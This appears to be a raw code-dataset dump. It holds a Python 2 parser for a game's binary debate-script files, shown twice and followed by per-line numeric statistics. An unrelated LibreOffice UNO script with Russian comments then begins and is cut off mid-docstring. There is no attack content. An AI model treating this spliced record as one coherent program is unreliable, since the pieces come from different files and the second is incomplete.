nonstop.read(16) num_lines = nonstop.read('uintle:16') # Four byte header plus 68 bytes per line. if nonstop.len < (4 + (num_lines * 68)) * 8: raise Exception("Invalid nonstop file.") prev_non_chatter = -1 self.lines = [] for i in range(num_lines): line = NonstopLine() line.file_num = nonstop.read('uintle:16') line.line_type = nonstop.read(32) if line.line_type in LINE_TYPE_MAP: line.line_type = LINE_TYPE_MAP[line.line_type] line.ammo_id = nonstop.read('intle:16') line.converted_id = nonstop.read('intle:16') line.unknown1 = nonstop.read(16) line.weak_point = nonstop.read('uintle:16') line.delay = nonstop.read('intle:16') line.orientation = nonstop.read('intle:16') line.in_effect = nonstop.read('intle:16') line.out_effect = nonstop.read('intle:16') line.time_visible = nonstop.read('intle:16') line.x_start = nonstop.read('intle:16') line.y_start = nonstop.read('intle:16') line.velocity = nonstop.read('intle:16') line.angle = nonstop.read('intle:16') line.zoom_start = nonstop.read('intle:16') line.zoom_change = nonstop.read('intle:16') line.shake = nonstop.read('intle:16') line.rot_angle = nonstop.read('intle:16') line.spin_vel = nonstop.read('intle:16') line.speaker = nonstop.read('intle:16') # Since we mess with speaker a little bit later, we want to keep the ID for the sprite. line.char_id = line.speaker line.sprite_id = nonstop.read('intle:16') line.unknown3 = nonstop.read(32) line.voice_id = nonstop.read('intle:16') line.unknown4 = nonstop.read(16) line.chapter = nonstop.read('intle:16') line.unknown5 = nonstop.read(32) line.unknown6 = nonstop.read(64) format = copy.deepcopy(TEXT_FORMATS[common.SCENE_MODES.debate]) format.orient = TEXT_ORIENT.hor if line.orientation == 0 else TEXT_ORIENT.ver format.align = TEXT_ALIGN.center if format.orient == TEXT_ORIENT.ver: format.y = format.h format.x = format.w / 3.5 self.script_pack[line.file_num].scene_info.format = format if line.line_type == NONSTOP_LINE_TYPE.normal: prev_non_chatter = line.file_num # Fixing some weirdness. # if filename in ["nonstop_06_003.dat", "nonstop_06_005.dat", "nonstop_06_006.dat", "nonstop_06_007.dat"] and line.speaker == 16: # line.speaker = 15 # if filename[:10] == "nonstop_06" and int(filename[11:14]) >= 10 and line.speaker == 10: # line.speaker = 18 # if filename in ["nonstop_02_003.dat", "nonstop_02_005.dat", "nonstop_04_005.dat", "nonstop_04_006.dat"] and line.speaker == 10: # line.speaker = 18 self.script_pack[line.file_num].scene_info.speaker = line.speaker sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id) self.script_pack[line.file_num].scene_info.sprite = sprite voice = VoiceId(line.speaker, line.chapter, line.voice_id) self.script_pack[line.file_num].scene_info.voice = voice self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.debate elif "hanron" in str(line.line_type): self.script_pack[line.file_num].scene_info.speaker = line.speaker sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id) self.script_pack[line.file_num].scene_info.sprite = sprite voice = VoiceId(line.speaker, line.chapter, line.voice_id) self.script_pack[line.file_num].scene_info.voice = voice self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.hanron elif line.line_type == NONSTOP_LINE_TYPE.chatter: self.script_pack[line.file_num].scene_info.speaker = -1 self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.chatter self.script_pack[line.file_num].scene_info.extra_val = prev_non_chatter else: _LOGGER.error("Invalid line type: %s" % line.line_type) file_order.append(line.file_num) self.lines.append(line) for index in xrange(len(self.script_pack)): if not index in file_order: file_order.append(index) self.script_pack.script_files = [self.script_pack[i] for i in file_order] if __name__ == "__main__": pass debates = [ # "hanron_01_001.dat", # "hanron_01_002.dat", # "hanron_01_003.dat", "hanron_02_001.dat", "hanron_02_002.dat", # "hanron_03_001.dat", # "hanron_03_002.dat", # "hanron_04_001.dat", # "hanron_04_002.dat", # "hanron_04_003.dat", # "hanron_05_001.dat", # "hanron_05_002.dat", # "hanron_06_001.dat", # "nonstop_01_001.dat", # "nonstop_01_002.dat", # "nonstop_01_003.dat", # "kokoro_09_001.dat", # "kokoro_09_002.dat", # "kokoro_09_003.dat", # "kokoro_09_004.dat", # "kokoro_09_005.dat", # "kokoro_09_006.dat", # "kokoro_09_007.dat", # "kokoro_09_008.dat", # "kokoro_09_009.dat", # "kokoro_09_010.dat", # "kokoro_09_011.dat", # "kokoro_09_012.dat", # "kokoro_09_013.dat", # "kokoro_09_014.dat", # "kokoro_09_015.dat", ] for debate in debates: parser = NonstopParser() parser.load(debate) for line in parser.lines: print "%4d %2d %2d %3d %s" % (line.file_num, line.orientation, line.speaker, line.voice_id, line.line_type) print ### EOF ###
[ "################################################################################\n", "### Copyright © 2012-2013 BlackDragonHunt\n", "### \n", "### This file is part of the Super Duper Script Editor.\n", "### \n", "### The Super Duper Script Editor is free software: you can redistribute it\n", "### and/or modify it under the terms of the GNU General Public License as\n", "### published by the Free Software Foundation, either version 3 of the License,\n", "### or (at your option) any later version.\n", "### \n", "### The Super Duper Script Editor is distributed in the hope that it will be\n", "### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "### GNU General Public License for more details.\n", "### \n", "### You should have received a copy of the GNU General Public License\n", "### along with the Super Duper Script Editor.\n", "### If not, see <http://www.gnu.org/licenses/>.\n", "################################################################################\n", "\n", "from bitstring import ConstBitStream, BitStream\n", "import copy\n", "import logging\n", "import os\n", "\n", "from enum import Enum\n", "\n", "import common\n", "from script_pack import ScriptPack\n", "from sprite import SpriteId, SPRITE_TYPE\n", "from text_format import TEXT_FORMATS, TEXT_ORIENT, TEXT_ALIGN\n", "from voice import VoiceId\n", "\n", "_LOGGER_NAME = common.LOGGER_NAME + \".\" + __name__\n", "_LOGGER = logging.getLogger(_LOGGER_NAME)\n", "\n", "NONSTOP_DIR = os.path.join(\"all\", \"bin\")\n", "\n", "NONSTOP_LINE_TYPE = Enum(\"normal\", \"chatter\", \"unknown1\", \"unknown3\", \"unknown4\", \"hanron1\", \"hanron2\", \"hanron3\", \"hanron4\", \"hanron5\", \"hanron6\", \"hanron7\", \"hanron8\", \"hanron_mc\")\n", "LINE_TYPE_MAP = {\n", " ConstBitStream(hex = \"0x00000000\"): NONSTOP_LINE_TYPE.normal,\n", " ConstBitStream(hex = \"0x01000100\"): NONSTOP_LINE_TYPE.chatter,\n", " ConstBitStream(hex = \"0x01000000\"): NONSTOP_LINE_TYPE.unknown1,\n", " ConstBitStream(hex = \"0x03000000\"): NONSTOP_LINE_TYPE.unknown3,\n", " ConstBitStream(hex = \"0x04000000\"): NONSTOP_LINE_TYPE.unknown4,\n", " ConstBitStream(hex = \"0x00000100\"): NONSTOP_LINE_TYPE.hanron1,\n", " ConstBitStream(hex = \"0x00000200\"): NONSTOP_LINE_TYPE.hanron2,\n", " ConstBitStream(hex = \"0x00000300\"): NONSTOP_LINE_TYPE.hanron3,\n", " ConstBitStream(hex = \"0x00000400\"): NONSTOP_LINE_TYPE.hanron4,\n", " ConstBitStream(hex = \"0x00000500\"): NONSTOP_LINE_TYPE.hanron5,\n", " ConstBitStream(hex = \"0x00000600\"): NONSTOP_LINE_TYPE.hanron6,\n", " ConstBitStream(hex = \"0x00000700\"): NONSTOP_LINE_TYPE.hanron7,\n", " ConstBitStream(hex = \"0x00000800\"): NONSTOP_LINE_TYPE.hanron8,\n", " ConstBitStream(hex = \"0x02000000\"): NONSTOP_LINE_TYPE.hanron_mc,\n", "}\n", "\n", "DIR_MAP = {\n", " \"nonstop_01_001.dat\": \"e01_202_001.lin\",\n", " \"nonstop_01_002.dat\": \"e01_204_001.lin\",\n", " \"nonstop_01_003.dat\": \"e01_208_001.lin\",\n", " \"nonstop_01_004.dat\": \"e01_210_001.lin\",\n", " \"nonstop_01_005.dat\": \"e01_212_001.lin\",\n", " \"nonstop_01_006.dat\": \"e01_216_001.lin\",\n", " \"nonstop_01_007.dat\": \"e01_222_001.lin\",\n", " \"nonstop_01_008.dat\": \"e01_224_001.lin\",\n", " \"nonstop_01_009.dat\": \"e01_228_001.lin\",\n", " \"hanron_01_001.dat\": \"e01_206_001.lin\",\n", " \"hanron_01_002.dat\": \"e01_214_001.lin\",\n", " \"hanron_01_003.dat\": \"e01_226_001.lin\",\n", " \n", " \"nonstop_02_001.dat\": \"e02_203_001.lin\",\n", " \"nonstop_02_002.dat\": \"e02_205_001.lin\",\n", " \"nonstop_02_003.dat\": \"e02_207_001.lin\",\n", " \"nonstop_02_004.dat\": \"e02_209_001.lin\",\n", " \"nonstop_02_005.dat\": \"e02_213_001.lin\",\n", " \"nonstop_02_006.dat\": \"e02_215_001.lin\",\n", " \"nonstop_02_007.dat\": \"e02_223_001.lin\",\n", " \"hanron_02_001.dat\": \"e02_217_001.lin\",\n", " \"hanron_02_002.dat\": \"e02_225_001.lin\",\n", " \n", " \"nonstop_03_001.dat\": \"\",\n", " \"nonstop_03_002.dat\": \"\",\n", " \"nonstop_03_003.dat\": \"\",\n", " \"nonstop_03_004.dat\": \"\",\n", " \"nonstop_03_005.dat\": \"\",\n", " \"nonstop_03_006.dat\": \"\",\n", " \"nonstop_03_007.dat\": \"\",\n", " \"nonstop_03_008.dat\": \"e03_235_001.lin\",\n", " \"hanron_03_001.dat\": \"e03_212_001.lin\",\n", " \"hanron_03_002.dat\": \"e03_220_001.lin\",\n", " \n", " \"nonstop_04_001.dat\": \"\",\n", " \"nonstop_04_002.dat\": \"\",\n", " \"nonstop_04_003.dat\": \"\",\n", " \"nonstop_04_004.dat\": \"\",\n", " \"nonstop_04_005.dat\": \"\",\n", " \"nonstop_04_006.dat\": \"\",\n", " \"nonstop_04_007.dat\": \"\",\n", " \"nonstop_04_008.dat\": \"\",\n", " \"nonstop_04_009.dat\": \"\",\n", " \"nonstop_04_010.dat\": \"\",\n", " \"hanron_04_001.dat\": \"e04_208_001.lin\",\n", " \"hanron_04_002.dat\": \"e04_227_001.lin\",\n", " \"hanron_04_003.dat\": \"e04_245_001.lin\",\n", " \n", " \"nonstop_05_001.dat\": \"\",\n", " \"nonstop_05_002.dat\": \"\",\n", " \"nonstop_05_003.dat\": \"\",\n", " \"nonstop_05_004.dat\": \"\",\n", " \"nonstop_05_005.dat\": \"\",\n", " \"nonstop_05_006.dat\": \"\",\n", " \"nonstop_05_007.dat\": \"\",\n", " \"hanron_05_001.dat\": \"e05_204_001.lin\",\n", " \"hanron_05_002.dat\": \"e05_242_001.lin\",\n", " \n", " \"nonstop_06_001.dat\": \"\",\n", " \"nonstop_06_002.dat\": \"\",\n", " \"nonstop_06_003.dat\": \"\",\n", " \"nonstop_06_004.dat\": \"\",\n", " \"nonstop_06_005.dat\": \"\",\n", " \"nonstop_06_006.dat\": \"\",\n", " \"nonstop_06_007.dat\": \"\",\n", " \"nonstop_06_008.dat\": \"\",\n", " \"nonstop_06_009.dat\": \"\",\n", " \"nonstop_06_017.dat\": \"\",\n", " \n", " \"nonstop_14_001.dat\": \"\",\n", " \"nonstop_14_002.dat\": \"\",\n", " \"nonstop_14_003.dat\": \"\",\n", " \"nonstop_14_004.dat\": \"\",\n", " \"nonstop_14_005.dat\": \"\",\n", " \"nonstop_14_006.dat\": \"\",\n", " \"nonstop_14_007.dat\": \"\",\n", " \"nonstop_14_008.dat\": \"\",\n", " \n", " \"kokoro_09_001.dat\": \"e09_701_101.lin\",\n", " \"kokoro_09_002.dat\": \"e09_702_101.lin\",\n", " \"kokoro_09_003.dat\": \"e09_703_101.lin\",\n", " \"kokoro_09_004.dat\": \"e09_704_101.lin\",\n", " \"kokoro_09_005.dat\": \"e09_705_101.lin\",\n", " \"kokoro_09_006.dat\": \"e09_706_101.lin\",\n", " \"kokoro_09_007.dat\": \"e09_707_101.lin\",\n", " \"kokoro_09_008.dat\": \"e09_708_101.lin\",\n", " \"kokoro_09_009.dat\": \"e09_709_101.lin\",\n", " \"kokoro_09_010.dat\": \"e09_710_101.lin\",\n", " \"kokoro_09_011.dat\": \"e09_711_101.lin\",\n", " \"kokoro_09_012.dat\": \"e09_712_101.lin\",\n", " \"kokoro_09_013.dat\": \"e09_713_101.lin\",\n", " \"kokoro_09_014.dat\": \"e09_714_101.lin\",\n", " \"kokoro_09_015.dat\": \"e09_715_101.lin\",\n", "}\n", "\n", "class NonstopLine():\n", " def __init__(self):\n", " self.file_num = -1\n", " self.line_type = -1\n", " self.ammo_id = -1\n", " self.converted_id = -1\n", " self.unknown1 = -1\n", " self.weak_point = -1\n", " \n", " self.delay = -1\n", " self.orientation = -1\n", " self.in_effect = -1\n", " self.out_effect = -1\n", " self.time_visible = -1\n", " self.x_start = -1\n", " self.y_start = -1\n", " self.velocity = -1\n", " self.angle = -1\n", " self.zoom_start = -1\n", " self.zoom_change = -1\n", " self.shake = -1\n", " self.rot_angle = -1\n", " self.spin_vel = -1\n", " \n", " self.speaker = -1\n", " \n", " self.char_id = -1\n", " self.sprite_id = -1\n", " \n", " self.unknown3 = -1\n", " self.voice_id = -1\n", " self.unknown4 = -1\n", " self.chapter = -1\n", " self.unknown5 = -1\n", " self.unknown6 = -1\n", " \n", " def to_data(self):\n", " data = \\\n", " ConstBitStream(uintle = self.file_num, length = 16) + \\\n", " [key for key, value in LINE_TYPE_MAP.iteritems() if value == self.line_type][0] + \\\n", " ConstBitStream(uintle = self.ammo_id, length = 16) + \\\n", " ConstBitStream(uintle = self.converted_id, length = 16) + \\\n", " self.unknown1 + \\\n", " ConstBitStream(uintle = self.weak_point, length = 16) + \\\n", " ConstBitStream(intle = self.delay, length = 16) + \\\n", " ConstBitStream(intle = self.orientation, length = 16) + \\\n", " ConstBitStream(intle = self.in_effect, length = 16) + \\\n", " ConstBitStream(intle = self.out_effect, length = 16) + \\\n", " ConstBitStream(intle = self.time_visible, length = 16) + \\\n", " ConstBitStream(intle = self.x_start, length = 16) + \\\n", " ConstBitStream(intle = self.y_start, length = 16) + \\\n", " ConstBitStream(intle = self.velocity, length = 16) + \\\n", " ConstBitStream(intle = self.angle, length = 16) + \\\n", " ConstBitStream(intle = self.zoom_start, length = 16) + \\\n", " ConstBitStream(intle = self.zoom_change, length = 16) + \\\n", " ConstBitStream(intle = self.shake, length = 16) + \\\n", " ConstBitStream(intle = self.rot_angle, length = 16) + \\\n", " ConstBitStream(intle = self.spin_vel, length = 16) + \\\n", " ConstBitStream(uintle = self.char_id, length = 16) + \\\n", " ConstBitStream(uintle = self.sprite_id, length = 16) + \\\n", " self.unknown3 + \\\n", " ConstBitStream(uintle = self.voice_id, length = 16) + \\\n", " self.unknown4 + \\\n", " ConstBitStream(uintle = self.chapter, length = 16) + \\\n", " self.unknown5 + \\\n", " self.unknown6\n", " \n", " return data\n", "\n", "class NonstopParser():\n", " def __init__(self):\n", " self.script_pack = ScriptPack()\n", " self.filename = \"\"\n", " self.magic = None\n", " self.lines = []\n", " \n", " def save(self, filename):\n", " \n", " data = BitStream(self.magic) + BitStream(uintle = len(self.lines), length = 16)\n", " \n", " for line in self.lines:\n", " data += line.to_data()\n", " \n", " with open(filename, \"wb\") as f:\n", " data.tofile(f)\n", " \n", " def load(self, filename):\n", " filename = filename.lower()\n", " \n", " if not filename in DIR_MAP:\n", " _LOGGER.error(\"Invalid nonstop file: %s\" % filename)\n", " return\n", " \n", " self.filename = filename\n", " \n", " script_dir = DIR_MAP[filename]\n", " self.script_pack = ScriptPack(script_dir, common.editor_config.data01_dir)\n", " \n", " file_order = []\n", " \n", " # --- NONSTOP FORMAT ---\n", " # XX XX -- ???\n", " # XX XX -- Number of lines (not necessarily files)\n", " # \n", " # [68 bytes per line]\n", " # XX XX -- File number\n", " # XX XX XX XX\n", " # * 0x00000000 = normal line\n", " # * 0x01000100 = chatter\n", " # * 0x01000000 = ??? (Only appears in SDR2)\n", " # * 0x02000000 = ??? (Only appears in SDR2)\n", " # * 0x03000000 = ??? (Only appears in SDR2)\n", " # * 0x04000000 = ??? (Only appears in SDR2)\n", " # XX XX -- Ammo ID that reacts to this line.\n", " # XX XX -- Converted line ID that reacts to this line.\n", " # XX XX -- ???\n", " # XX XX -- 1 = has a weak point, 0 = has no weak point\n", " # XX XX -- The amount of time before the next line is shown (in sixtieths of seconds (frames?)).\n", " # XX XX -- Unknown (Possibly line orientation? Only 0 in the first game, but sometimes 2 in the second.)\n", " # XX XX -- Effect used when transitioning text in.\n", " # XX XX -- Effect used when transitioning text out.\n", " # * 0: fade\n", " # * 1: spin in/out\n", " # * 2: zoom out\n", " # * 3: slide in/out\n", " # XX XX -- The amount of the the line stays on-screen (in sixtieths of seconds (frames?)).\n", " # XX XX -- Initial X position (text centered around this pos).\n", " # XX XX -- Initial Y position (text centered around this pos).\n", " # XX XX -- Text velocity.\n", " # XX XX -- Angle of motion.\n", " # XX XX -- Initial text zoom (in percent).\n", " # XX XX -- Change in zoom over time (in percent).\n", " # * 90% means it gradually shrinks.\n", " # * 100% means it stays the same size the whole time.\n", " # * 110% means it gradually grows.\n", " # XX XX -- 0 = no shake, 1 = shake\n", " # XX XX -- Rotate the text clockwise to this angle.\n", " # XX XX -- Text spins clockwise at this rate.\n", " # XX XX -- Speaker (00 00 if chatter)\n", " # XX XX -- Sprite ID (00 00 if chatter)\n", " # XX XX XX XX -- ???\n", " # XX XX -- Voice index (FF FF if chatter)\n", " # XX XX -- ???\n", " # XX XX -- Chapter\n", " # XX XX XX XX -- ??? (padding?)\n", " nonstop = ConstBitStream(filename = os.path.join(common.editor_config.data01_dir, NONSTOP_DIR, self.filename))\n", " \n", " self.magic = nonstop.read(16)\n", " num_lines = nonstop.read('uintle:16')\n", " \n", " # Four byte header plus 68 bytes per line.\n", " if nonstop.len < (4 + (num_lines * 68)) * 8:\n", " raise Exception(\"Invalid nonstop file.\")\n", " \n", " prev_non_chatter = -1\n", " self.lines = []\n", " \n", " for i in range(num_lines):\n", " line = NonstopLine()\n", " \n", " line.file_num = nonstop.read('uintle:16')\n", " \n", " line.line_type = nonstop.read(32)\n", " if line.line_type in LINE_TYPE_MAP:\n", " line.line_type = LINE_TYPE_MAP[line.line_type]\n", " \n", " line.ammo_id = nonstop.read('intle:16')\n", " line.converted_id = nonstop.read('intle:16')\n", " line.unknown1 = nonstop.read(16)\n", " line.weak_point = nonstop.read('uintle:16')\n", " \n", " line.delay = nonstop.read('intle:16')\n", " line.orientation = nonstop.read('intle:16')\n", " line.in_effect = nonstop.read('intle:16')\n", " line.out_effect = nonstop.read('intle:16')\n", " line.time_visible = nonstop.read('intle:16')\n", " line.x_start = nonstop.read('intle:16')\n", " line.y_start = nonstop.read('intle:16')\n", " line.velocity = nonstop.read('intle:16')\n", " line.angle = nonstop.read('intle:16')\n", " line.zoom_start = nonstop.read('intle:16')\n", " line.zoom_change = nonstop.read('intle:16')\n", " line.shake = nonstop.read('intle:16')\n", " line.rot_angle = nonstop.read('intle:16')\n", " line.spin_vel = nonstop.read('intle:16')\n", " \n", " line.speaker = nonstop.read('intle:16')\n", " \n", " # Since we mess with speaker a little bit later, we want to keep the ID for the sprite.\n", " line.char_id = line.speaker\n", " line.sprite_id = nonstop.read('intle:16')\n", " \n", " line.unknown3 = nonstop.read(32)\n", " line.voice_id = nonstop.read('intle:16')\n", " line.unknown4 = nonstop.read(16)\n", " line.chapter = nonstop.read('intle:16')\n", " line.unknown5 = nonstop.read(32)\n", " line.unknown6 = nonstop.read(64)\n", " \n", " format = copy.deepcopy(TEXT_FORMATS[common.SCENE_MODES.debate])\n", " format.orient = TEXT_ORIENT.hor if line.orientation == 0 else TEXT_ORIENT.ver\n", " format.align = TEXT_ALIGN.center\n", " \n", " if format.orient == TEXT_ORIENT.ver:\n", " format.y = format.h\n", " format.x = format.w / 3.5\n", " \n", " self.script_pack[line.file_num].scene_info.format = format\n", " \n", " if line.line_type == NONSTOP_LINE_TYPE.normal:\n", " prev_non_chatter = line.file_num\n", " \n", " # Fixing some weirdness.\n", " # if filename in [\"nonstop_06_003.dat\", \"nonstop_06_005.dat\", \"nonstop_06_006.dat\", \"nonstop_06_007.dat\"] and line.speaker == 16:\n", " # line.speaker = 15\n", " # if filename[:10] == \"nonstop_06\" and int(filename[11:14]) >= 10 and line.speaker == 10:\n", " # line.speaker = 18\n", " # if filename in [\"nonstop_02_003.dat\", \"nonstop_02_005.dat\", \"nonstop_04_005.dat\", \"nonstop_04_006.dat\"] and line.speaker == 10:\n", " # line.speaker = 18\n", " \n", " self.script_pack[line.file_num].scene_info.speaker = line.speaker\n", " \n", " sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id)\n", " self.script_pack[line.file_num].scene_info.sprite = sprite\n", " \n", " voice = VoiceId(line.speaker, line.chapter, line.voice_id)\n", " self.script_pack[line.file_num].scene_info.voice = voice\n", " \n", " self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.debate\n", " \n", " elif \"hanron\" in str(line.line_type):\n", " \n", " self.script_pack[line.file_num].scene_info.speaker = line.speaker\n", " \n", " sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id)\n", " self.script_pack[line.file_num].scene_info.sprite = sprite\n", " \n", " voice = VoiceId(line.speaker, line.chapter, line.voice_id)\n", " self.script_pack[line.file_num].scene_info.voice = voice\n", " \n", " self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.hanron\n", " \n", " elif line.line_type == NONSTOP_LINE_TYPE.chatter:\n", " self.script_pack[line.file_num].scene_info.speaker = -1\n", " self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.chatter\n", " self.script_pack[line.file_num].scene_info.extra_val = prev_non_chatter\n", " \n", " else:\n", " _LOGGER.error(\"Invalid line type: %s\" % line.line_type)\n", " \n", " file_order.append(line.file_num)\n", " self.lines.append(line)\n", " \n", " for index in xrange(len(self.script_pack)):\n", " if not index in file_order:\n", " file_order.append(index)\n", " \n", " self.script_pack.script_files = [self.script_pack[i] for i in file_order]\n", "\n", "if __name__ == \"__main__\":\n", " pass\n", " debates = [\n", " # \"hanron_01_001.dat\",\n", " # \"hanron_01_002.dat\",\n", " # \"hanron_01_003.dat\",\n", " \"hanron_02_001.dat\",\n", " \"hanron_02_002.dat\",\n", " # \"hanron_03_001.dat\",\n", " # \"hanron_03_002.dat\",\n", " # \"hanron_04_001.dat\",\n", " # \"hanron_04_002.dat\",\n", " # \"hanron_04_003.dat\",\n", " # \"hanron_05_001.dat\",\n", " # \"hanron_05_002.dat\",\n", " # \"hanron_06_001.dat\",\n", " \n", " # \"nonstop_01_001.dat\",\n", " # \"nonstop_01_002.dat\",\n", " # \"nonstop_01_003.dat\",\n", " # \"kokoro_09_001.dat\",\n", " # \"kokoro_09_002.dat\",\n", " # \"kokoro_09_003.dat\",\n", " # \"kokoro_09_004.dat\",\n", " # \"kokoro_09_005.dat\",\n", " # \"kokoro_09_006.dat\",\n", " # \"kokoro_09_007.dat\",\n", " # \"kokoro_09_008.dat\",\n", " # \"kokoro_09_009.dat\",\n", " # \"kokoro_09_010.dat\",\n", " # \"kokoro_09_011.dat\",\n", " # \"kokoro_09_012.dat\",\n", " # \"kokoro_09_013.dat\",\n", " # \"kokoro_09_014.dat\",\n", " # \"kokoro_09_015.dat\",\n", " ]\n", " \n", " for debate in debates:\n", " parser = NonstopParser()\n", " parser.load(debate)\n", " for line in parser.lines:\n", " print \"%4d %2d %2d %3d %s\" % (line.file_num, line.orientation, line.speaker, line.voice_id, line.line_type)\n", " \n", " print\n", "\n", "### EOF ###" ]
[ 0.012345679012345678, 0.023809523809523808, 0.2, 0.017857142857142856, 0.2, 0.013157894736842105, 0.013513513513513514, 0.0125, 0.023255813953488372, 0.2, 0.012987012987012988, 0.013333333333333334, 0.015151515151515152, 0.02040816326530612, 0.2, 0.014285714285714285, 0.021739130434782608, 0.020833333333333332, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00546448087431694, 0, 0.03125, 0.03076923076923077, 0.030303030303030304, 0.030303030303030304, 0.030303030303030304, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.029850746268656716, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.045454545454545456, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0, 0.037037037037037035, 0.037037037037037035, 0.2, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.2, 0.037037037037037035, 0.2, 0.037037037037037035, 0.037037037037037035, 0.2, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.3333333333333333, 0.047619047619047616, 0, 0.06451612903225806, 0.011111111111111112, 0.06557377049180328, 0.06060606060606061, 0, 0.0625, 0.06896551724137931, 0.0625, 0.06451612903225806, 0.06349206349206349, 0.06153846153846154, 0.06666666666666667, 0.06666666666666667, 0.06557377049180328, 0.06896551724137931, 0.06349206349206349, 0.0625, 0.06896551724137931, 0.06451612903225806, 0.06557377049180328, 0.06557377049180328, 0.06349206349206349, 0, 0.06451612903225806, 0, 0.06557377049180328, 0, 0, 0.2, 0, 0, 0.043478260869565216, 0.045454545454545456, 0, 0, 0, 0, 0.3333333333333333, 0.03571428571428571, 0.2, 0.05952380952380952, 0.2, 0, 0.034482758620689655, 0.2, 0, 0.047619047619047616, 0.3333333333333333, 0.03571428571428571, 0, 0.2, 0.03125, 0.01694915254237288, 0.07692307692307693, 0.2, 0, 0.2, 0, 0, 0.2, 0, 0.2, 0, 0, 0, 0.14285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009345794392523364, 0.008695652173913044, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02608695652173913, 0.2, 0, 0, 0.2, 0, 0, 0.02127659574468085, 0.2, 0, 0, 0.2, 0, 0.05, 0.14285714285714285, 0.038461538461538464, 0.14285714285714285, 0.046511627906976744, 0.023809523809523808, 0, 0.14285714285714285, 0.0392156862745098, 0.0196078431372549, 0.046511627906976744, 0.038461538461538464, 0.14285714285714285, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0196078431372549, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.14285714285714285, 0.0392156862745098, 0.14285714285714285, 0.02127659574468085, 0.05128205128205128, 0.0392156862745098, 0.14285714285714285, 0.046511627906976744, 0.0392156862745098, 0.046511627906976744, 0.0392156862745098, 0.046511627906976744, 0.046511627906976744, 0.14285714285714285, 0.014285714285714285, 0.023809523809523808, 0.05, 0.14285714285714285, 0.023255813953488372, 0, 0, 0.14285714285714285, 0.015384615384615385, 0.14285714285714285, 0.018867924528301886, 0, 0.1111111111111111, 0, 0.007246376811594203, 0.06666666666666667, 0.01020408163265306, 0.06666666666666667, 0.007246376811594203, 0.06666666666666667, 0.1111111111111111, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0.011235955056179775, 0.14285714285714285, 0.022727272727272728, 0.1111111111111111, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0.02197802197802198, 0.14285714285714285, 0.017857142857142856, 0.015151515151515152, 0.021739130434782608, 0, 0.14285714285714285, 0.08333333333333333, 0, 0.14285714285714285, 0.02564102564102564, 0.03333333333333333, 0.2, 0, 0.058823529411764705, 0, 0.2, 0, 0, 0.037037037037037035, 0.14285714285714285, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0.04, 0, 0, 0, 0.01694915254237288, 0.2, 0, 0, 0.18181818181818182 ]
457
0.039682
false
#!/usr/bin/python3 # http://stackoverflow.com/questions/7783678/remote-control-or-script-open-office-to-edit-word-document-from-python # установить пакет libreoffice-librelogo # запускать от python3 ./script.py; установщик пакетов python3-pip, зпускать как pip3 # soffice.exe "-accept=socket,host=localhost,port=2002;urp;" -writer -headless & # Для Windows - питон встроен в Libreoffice !!! # set path="C:\Program Files\LibreOffice 5\program" # set path="C:\Program Files (x86)\LibreOffice5\program" # перейти в cd "C:\Program Files (x86)\LibreOffice5\program" и выполнить python D:\Distr\program\Python\My-Project\rununo.py # http://lucasmanual.com/mywiki/OpenOffice#Modifyingtext # Джанго http://davidmburke.com/2010/09/21/django-and-openoffice-org-uno-reports/ """ Открыть консоль в каталоге "C:\Program Files (x86)\LibreOffice 5\program" запускать скрипты оттуда: C:\Program Files (x86)\LibreOffice 5\program>python D:\Distr\program\Python\My-Project\oracle.py C:\Program Files (x86)\LibreOffice 5\program>python 